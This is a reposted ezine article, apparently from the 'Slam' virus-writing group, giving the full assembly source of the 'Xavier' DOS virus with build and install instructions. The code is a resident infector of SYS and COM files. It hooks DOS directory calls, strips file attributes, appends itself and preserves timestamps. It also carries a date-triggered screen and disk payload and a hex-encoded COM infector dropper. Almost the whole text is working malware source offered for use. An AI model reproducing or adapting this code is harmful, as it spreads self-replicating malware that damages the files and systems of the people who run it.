Copy Link
Add to Bookmark
Report

SLAM3.013: The Xavier Virus by Xavirus Hacker

eZine's profile picture
Published in 
Slam
 · 2 years ago

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ; V I R U S ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;€; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € ‹flflfl‹ € € € ‹flflflflflfl fl€flflflflfl‹ €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € € € € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; fl€fl € € € € € €flflflfl € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ‹€‹ €flflfl€ € € € € €‹‹‹‹fl €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € € € € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € fl‹‹‹‹‹ € € fl; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; MADE IN LUQUE, PARAGUAY. By Xavirus Hacker ‹; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ;  TSR infector of SYS/COM programs. ; ; ; ; ; ;
; ; ;  Infects when a operation with FCB is made (DIR,COPY,etc.) ; ; ; ; ; ;
; ; ;  The victim is opened in read only mode, then is turned ; ; ; ; ; ;
; ; ; into read/write mode, and the attributes are kicked. ; ; ; ; ; ;
; ; ;  Bestial & psycodelic payload on september 13. ; ; ; ; ; ;
; ; ;  Time/Date/Attributes preserved. ; ; ; ; ; ;
; ; ;  Doesn't reinfects SYS or COM files (hehehehehe). ; ; ; ; ; ;
; ; ;  With thanx to Dark Angel. ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; How to make the virus work: ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; Tasm Xavier.Asm * Tlink Xavier.Obj ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; Exe2Bin Xavier.Exe * Ren Xavier.Bin Xavier.Sys; ; ; ; ; ; ; ; ; ;
; ; ; ; ; Load it as device in your config.sys and that all.; ; ; ; ; ; ; ; ;

.MODEL TINY
.CODE
ORG 0h

Cabecera:
Siguiente_Cabecera dw 0ffffh,0ffffh
Atributo dw 8000h
restrategica dw offset Estrategica
rinterrupt dw offset Interrupcion
BautizadoComo db 'XAVIER! '
FinDeCabecera:

Estrategica:
Push bp
Call DeltaEstrategica
DeltaEstrategica:
Pop bp
Mov cs:[bp+offset GuardarBX-offset DeltaEstrategica],bx
Mov cs:[bp+offset GuardarES-offset DeltaEstrategica],es
Pop bp
retf

Puente:
Jmp SalirInterrupcion

Interrupcion:
Push bp
Push ax
Push bx
Push cx
Push dx
Push ds
Push es
Push si

Push cs
Pop ds
Call DeltaInterrupcion
DeltaInterrupcion:
Pop bp

Les bx,cs:[bp+GuardarBX-DeltaInterrupcion]
Mov es:[bx+3],8103h
Cmp Byte ptr es:[bx+2],0
Jnz Puente

Mov es:[bx+10h],cs
Lea si,[bp+Cabecera-DeltaInterrupcion]
Mov es:[bx+0eh],si
Dec Byte ptr es:[bx+3]

Mov ax,'XA'
Int 21h

Cmp cx,'V!'
Jz Puente

Add Word ptr es:[bx+0eh],offset FinMonton
Mov es:[bx+3],0100h

Mov ax,03521h
Int 21h
Mov Word ptr cs:[bp+Vieja21h-DeltaInterrupcion],bx
Mov Word ptr cs:[bp+Vieja21h+2-DeltaInterrupcion],es
Lea dx,[bp+Interrupcion21h-DeltaInterrupcion]
Push cs
Pop ds

Mov ax,02521h
Int 21h

Mov ah,2ah
Int 21h

Cmp dh,09
Jne SalirInterrupcion
Cmp dl,13d
Jne SalirInterrupcion

in al,21h
or al,02
out 21h,al
Mov ax,0013h
Int 010h
Sub ax,ax
Mov ds,ax
Xor si,si
Blink:
Mov bx,0417h
Mov Byte ptr [bx],16d
Call Retardo
Mov Byte ptr [bx],32d
Call Retardo
Mov Byte ptr [bx],64d
Call Retardo
Push bx
Push ds
Push cs
Pop ds

Mov ax,0201h
Lea bx,bp+FinMonton
Mov cx,0202
Mov dh,1
Mov dl,1
Int 13h

Mov ax,0201h
Mov dl,0
Int 13h

Pop ds
Pop bx
Inc si
Cmp si,255
jbe Here
Xor si,si

Here:
Mov di,0a000h
Mov es,di
Mov cx,65535d
Mov ax,si
Repe Stosb
Loop Blink

Retardo:
Mov ah,01h
Int 16h
Mov cx,30000d
Pausa:
in al,4Fh
Loop Pausa
ret


SalirInterrupcion:
Pop si
Pop es
Pop ds
Pop dx
Pop cx
Pop bx
Pop ax
Pop bp
retf

db ' [XAVIER!] by Xavirus Hacker '

Interrupcion21h:
Cmp ax,'XA'
Jnz ContinuarInt21h
Mov cx,'V!'
SalirInt21h:
iret
db 'XH'
ContinuarInt21h:
Pushf
db 09ah
Vieja21h dw 0,0
Pushf
Push bp
Push ax
Mov bp,sp
Mov ax,[bp+4]
Mov [bp+10],ax
Pop ax
Pop bp
Popf

Cmp ah,11h
Je UsanFileControlBlock
Cmp ah,12h
Je UsanFileControlBlock
iret

UsanFileControlBlock:
Cmp al,0ffh
Je SalirInt21h

Push bp
Call OtroDelta
OtroDelta:
Pop bp
Sub bp,offset OtroDelta

Push ax
Push bx
Push cx
Push dx
Push ds
Push es
Push si
Push di

Mov ah,2fh
Int 21h
Cmp Byte ptr es:[bx],0ffh
Jnz FCBnormal

Add bx,0007h
FCBnormal:
Mov cx,es:[bx+1dh]
Mov cs:[bp+Grandor],cx
Push es
Pop ds
Push cs
Pop es
cld

Lea di,bp+Victima
Mov si,bx
Inc si

Mov cx,0008h
Seguir:
Cmp Byte ptr ds:[si],20h
Jz Termino
Movsb
loop Seguir

Termino:
Mov al,"."
Stosb

Lea si,[bx+9]
Mov ax,'YS'
Cmp Word ptr [si],ax
Jne PuedeSerCOM
stosw
Cmp Byte ptr [si+2],al
Jne RetornoDeLaInt21h
Stosb
Xor cx,cx
Jmp short surivaX

PuedeSerCOM:
Mov ax,'OC'
Cmp Word ptr [si],ax
Jne RetornoDeLaInt21h
stosw
Mov al,'M'
Cmp Byte ptr [si+2],al
Jne RetornoDeLaInt21h
Stosb
Mov cx,32d

surivaX:
Xor ax,ax
Stosb
Push cs
Pop ds
Mov di,cx

Mov ax,3d00h
Lea dx,bp+Victima
Int 21h
xchg bx,ax ; This takes just 1 byte: XCHG AX,BX takes 2!
jc RetornoDeLaInt21h

Mov ah,3fh
Mov cx,0003d
Lea dx,bp+buffer
Int 21h

Cmp Word ptr ds:[bp+buffer],'MZ'
Je Vamos
Cmp Word ptr ds:[bp+buffer],'ZM'
Je Vamos

Cmp di,32d
Je Revisar
Inc Word ptr ds:[bp+buffer]
Jz Putrefaccion
Jmp short Vamos
Revisar:
Cmp Byte ptr ds:[bp+buffer],0e9h
Jne PudrirCOM
Vamos:
Mov ah,3eh
Int 21h

RetornoDeLaInt21h:
Pop di
Pop si
Pop es
Pop ds
Pop dx
Pop cx
Pop bx
Pop ax
Pop bp
iret

Putrefaccion:
Jmp PudrirSYS

PudrirCOM:
Push ds
Pop es
Call ModificarSFT

Mov ax,5700h
Int 21h
Push cx
Push dx

Mov ax,4202h
cwd
Xor cx,cx
Int 21h

Sub ax,3
Mov Word ptr ds:[bp+Salto+1],ax

Lea dx,bp+VirusXavier
Mov ah,40h
Mov cx,016fh
Int 21h

Mov ax,4200h
Sub dx,dx
Sub cx,cx
Int 21h

Lea dx,bp+Salto
Mov ah,40h
Mov cx,3
Int 21h

Call Restoring

Pop dx
Pop cx
and cl,11100000b
or cl,00011111b
Mov ax,5701h
Int 21h
Jmp Vamos


ModificarSFT:
Push bx
Mov ax,1220h
Int 2fh

Mov ax,1216h
Xor bh,bh
Mov bl,es:[di]
Int 2fh

Mov cl,Byte ptr es:[di+4]
Mov Byte ptr cs:[bp+FileAtributo],cl
Mov Byte ptr es:[di+4],20h
Mov Byte ptr es:[di+2],02
Mov Word ptr es:[di+015h],00
Mov Word ptr es:[di+017h],00
Pop bx
ret


Restoring:
Mov cl,Byte ptr cs:[bp+FileAtributo]
Mov Byte ptr es:[di+4],cl
ret

PudrirSYS:
Push ds
Pop es
Mov Word ptr ds:[bp+NuevaCabecera+4],8000h
Mov cx,cs:[bp+Grandor]
Add cx,(offset Estrategica-offset Cabecera)
Mov Word ptr ds:[bp+NuevaCabecera+6],cx
Add cx,(offset Interrupcion-offset Estrategica)
Mov Word ptr cs:[bp+NuevaCabecera+8],cx
Mov Word ptr cs:[bp+NuevaCabecera+0],0ffffh
Mov Word ptr cs:[bp+NuevaCabecera+2],0ffffh

Call ModificarSFT

Mov ax,5700h
Int 21h
Push cx
Push dx

Mov ah,40h
Mov cx,0002
Lea dx,bp+Grandor
Int 21h

Mov ax,4202h
Xor cx,cx
cwd
Int 21h

Mov ah,40h
Mov cx,18d
Lea dx,bp+NuevaCabecera
Int 21h

Mov ah,40h
Mov cx,(offset Monton-offset FinDeCabecera)
Lea dx,bp+FinDeCabecera
Int 21h

Call Restoring

Pop dx
Pop cx
Mov ax,5701h
Int 21h
Jmp Vamos

VirusXavier: ; 016f bytes, virus to be dropped. TSR (IVT) COM fast infector.
db 0e8h,000h,000h,05dh,081h,0edh,003h,001h,033h,0c9h,08eh,0c1h,0fch,026h,081h,03eh
db 004h,002h,081h,0edh,074h,02ch,0b8h,021h,035h,0cdh,021h,08ch,086h,07eh,001h,089h
db 09eh,07ch,001h,033h,0d2h,0bfh,000h,002h,08eh,0c2h,0b9h,06fh,001h,08dh,0b6h,000h
db 001h,0f3h,0a4h,0cch,006h,01fh,0b8h,021h,025h,0bah,05bh,002h,0cdh,021h,033h,0c0h
db 033h,0d2h,02bh,0dbh,00eh,00eh,01fh,007h,08bh,0cbh,0bfh,000h,001h,08dh,0b6h,061h
db 002h,057h,0a4h,0a5h,02bh,0ffh,033h,0edh,02bh,0f6h,0c3h,09ch,03dh,000h,03dh,074h
db 025h,03dh,001h,03dh,074h,020h,080h,0fch,04bh,074h,01bh,080h,0fch,041h,074h,016h
db 080h,0fch,043h,074h,011h,080h,0fch,056h,074h,00ch,09dh,0eah,000h,000h,000h,000h
db 0b0h,003h,0cfh,0e9h,0b5h,000h,050h,053h,051h,052h,056h,057h,01eh,006h,052h,01eh
db 0b8h,024h,035h,0cdh,021h,02eh,08ch,006h,066h,003h,02eh,089h,01eh,064h,003h,00eh
db 01fh,0b8h,024h,025h,0bah,080h,002h,0cdh,021h,01fh,05ah,01eh,007h,0fch,08bh,0fah
db 0b9h,07dh,000h,0b0h,02eh,0f2h,0aeh,075h,0cah,087h,0f7h,0adh,00dh,020h,020h,03dh
db 063h,06fh,075h,077h,0ach,00ch,020h,03ch,06dh,075h,070h,0b8h,002h,03dh,0cdh,021h
db 072h,069h,093h,00eh,00eh,01fh,007h,0b8h,000h,057h,0cdh,021h,089h,016h,02ah,003h
db 089h,00eh,02dh,003h,080h,0e1h,01fh,080h,0f9h,01fh,074h,04bh,0b4h,03fh,0bah,061h
db 003h,0b9h,003h,000h,0cdh,021h,08bh,0f2h,08bh,004h,002h,0e0h,080h,0fch,0a7h,074h
db 036h,0e8h,051h,000h,03dh,000h,0fah,073h,02eh,02dh,003h,000h,0a3h,05fh,003h,0b4h
db 040h,0bah,000h,002h,0b9h,06fh,001h,0cdh,021h,0e8h,034h,000h,0bah,05eh,003h,0b4h
db 040h,0b9h,003h,000h,0cdh,021h,0b8h,001h,057h,0bah,000h,000h,0b9h,000h,000h,080h
db 0e1h,0e0h,080h,0c9h,01fh,0cdh,021h,0b4h,03eh,0cdh,021h,02eh,0c5h,016h,064h,003h
db 0b8h,024h,025h,0cdh,021h,007h,01fh,05fh,05eh,05ah,059h,05bh,058h,0e9h,02ah,0ffh
db 0b8h,000h,042h,0ebh,003h,0b8h,002h,042h,02bh,0c9h,099h,0cdh,021h,0c3h
Salto db 0e9h,000h,000h
Buffer db 090h,0cdh,020h,000h,000h,000h,000h
BeastName db 'XAVIER!'

Monton:
Victima db 13d dup (0)
NuevaCabecera db 10d dup (0)
Grandor dw 01d dup (0)
FileAtributo db 0
GuardarBX dw 0
GuardarES dw 0
Hora dw 0
Fecha dw 0
FinMonton:

End

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT